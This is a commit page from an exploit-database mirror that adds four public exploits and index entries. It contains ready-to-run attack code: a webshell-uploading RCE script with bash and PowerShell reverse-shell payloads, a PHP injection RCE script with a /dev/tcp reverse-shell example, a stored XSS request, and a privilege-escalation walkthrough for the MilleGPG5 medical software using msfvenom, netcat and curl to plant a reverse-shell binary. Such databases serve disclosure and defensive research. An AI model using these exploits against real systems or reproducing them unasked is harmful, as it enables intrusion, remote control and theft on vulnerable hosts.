bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-12-02

Browse source 
4 changes to exploits/shellcodes

MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation
Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting
Advanced Comment System 1.0 - Remote Command Execution (RCE)
This commit is contained in:
Offensive Security 2021-12-02 05:02:09 +00:00
parent ebf638ee1a
commit 1abdd81300
5 changed files with 268 additions and 13 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
exploits/php/webapps/50556.py
View file

@ -49,11 +49,8 @@ class Exploit:
}
#Creates user "bypass" and upload a simple webshell without
authentication
request = self.session.post(url,
data=data,headers=self.headers,files={"image":(self.shell_name
+'.php',"<?=`$_GET[cmd]`?>")})
#Creates user "bypass" and upload a simple webshell without authentication
request = self.session.post(url,data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"<?=`$_GET[cmd]`?>")})
time.sleep(3)
if (request.status_code == 200):
print('[*] The user and webshell were created\n')
@ -69,8 +66,7 @@ data=data,headers=self.headers,files={"image":(self.shell_name
#Use a payload in bash to get a reverse shell
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
execute_command =
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
try:
request_rce = requests.get(execute_command)
@ -86,11 +82,9 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
time.sleep(3)
#Use a payload in powershell to get a reverse shell
payload =
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
execute_command =
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
try:
@ -105,8 +99,7 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
def get_args():
parser = argparse.ArgumentParser(description='Laundry Booking
Management System')
parser = argparse.ArgumentParser(description='Laundry Booking Management System')
parser.add_argument('-t', '--target', dest="target", required=True,
action='store', help='Target url')
parser.add_argument('-s', '--shell_name', dest="shell_name",

68
exploits/php/webapps/50557.txt Normal file
View file

@ -0,0 +1,68 @@
# Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting
# Date: 2021-08-31
# Exploit Author: Tushar Jadhav
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Version: 1.0
# Tested on: Windows 11
# Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/
# CVE: CVE-2021-40577
=============================================================================================================================
Stored Cross-site scripting(XSS):
Stored attacks are those where the injected script is permanently stored on
the target servers,
such as in a database, in a message forum, visitor log, comment field, etc.
The victim then retrieves the malicious script from the server when it
requests the stored information.
Stored XSS is also sometimes referred to as Persistent XSS.
==============================================================================================================================
Attack vector:
This vulnerability can result in the attacker can injecting the XSS payload
in the User Registration section. Each time the admin login or basic user
Login in the admin panel, the XSS triggers and attacker can able to steal
the cookie according to the crafted payload.
===============================================================================================================================
Vulnerable Parameters: Name
===============================================================================================================================
Steps for reproducing:
1. Go to add users section
2. fill in the details. & put <script>alert(document.cookie)</script>
payload in Name parameter.
3. Once we click on save, We can see the XSS has been triggered.
================================================================================================================================
Request :
POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1
Host: 192.168.1.205:81
Content-Length: 133
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.205:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:
http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3
Connection: close
deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save=
===================================================================================================================================

65
exploits/php/webapps/50559.py Executable file
View file

@ -0,0 +1,65 @@
# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)
# Date: November 30, 2021
# Exploit Author: Nicole Daniella Murillo Mejias
# Version: Advanced Comment System 1.0
# Tested on: Linux
#!/usr/bin/env python3
# DESCRIPTION:
# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the
# response is filtered by the randomly generated alphanumeric string and only command output
# is displayed.
#
# USAGE:
# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted
# If any special characters are used, they should be quoted with single quotes.
#
# Example:
#
# python3 acspoc.py uname -a
# python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'
import sys
import base64
import requests
import random
def generate_string(size):
str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
return ''.join(random.choice(str) for i in range(size))
def exploit(cmd):
# TODO: Change the URL to the target host
url = 'http://127.0.0.1/advanced_comment_system/index.php'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
encoded_cmd = base64.b64encode(cmd)
delimiter = generate_string(6).encode()
body = b'ACS_path=php://input%00&cbcmd='
body += encoded_cmd
body += b'&<?php echo " '
body += delimiter
body += b': ".shell_exec(base64_decode($_REQUEST["cbcmd"])); die ?>'
try:
result = requests.post(url=url, headers=headers, data=body)
except KeyboardInterrupt:
print("Keyboard interrupt detected.")
sys.exit()
if f'{delimiter.decode()}: ' in result.text:
position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")
if len(result.text[position:]) > 0:
print(result.text[position:])
else:
print(f"No output from command '{cmd.decode()}'")
print(f"Response size from target host: {len(result.text)} bytes")
if __name__ == "__main__":
exploit(' '.join(sys.argv[1:]).encode())

126
exploits/windows/local/50558.txt Normal file
View file

@ -0,0 +1,126 @@
# Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation
# Date: 2021-07-19
# Author: Alessandro 'mindsflee' Salzano
# Vendor Homepage: https://millegpg.it/
# Software Homepage: https://millegpg.it/
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
# Version: 5.7.2
# Tested on: Microsoft Windows 10 Enterprise x64
MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute".
Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.
Affected version: MilleGPG5 5.7.2
# Details
# By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below.
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
(1) Impacted services.
Any low privileged user can elevate their privileges abusing these services:
C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe
C:\Program Files\MilleGPG5\GPGService.exe
Details:
SERVICE_NAME: MariaDB-GPG
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program
Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MariaDB-GPG
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
------
SERVICE_NAME: GPGOrchestrator
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : GPG Orchestrator
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
(2) Folder permissions.
Insecure folders permissions issue:
C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT
SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT
AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE
AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE
AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE
AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE
AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
...[SNIP]...
---------------
C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL
APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL
APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
# Proof of Concept
1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
2. Setup listener and ensure apache is running on attacking machine
nc -lvp 4242
service apache2 start
3. Download malicious .exe on victim machine
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe"
4. Overwrite file and copy malicious .exe.
Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
5. Restart victim machine
6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system

3
files_exploits.csv
View file

@ -11421,6 +11421,7 @@ id,file,description,date,author,type,platform,port
50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44645,3 +44646,5 @@ id,file,description,date,author,type,platform,port
50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,

Can't render this file because it is too large.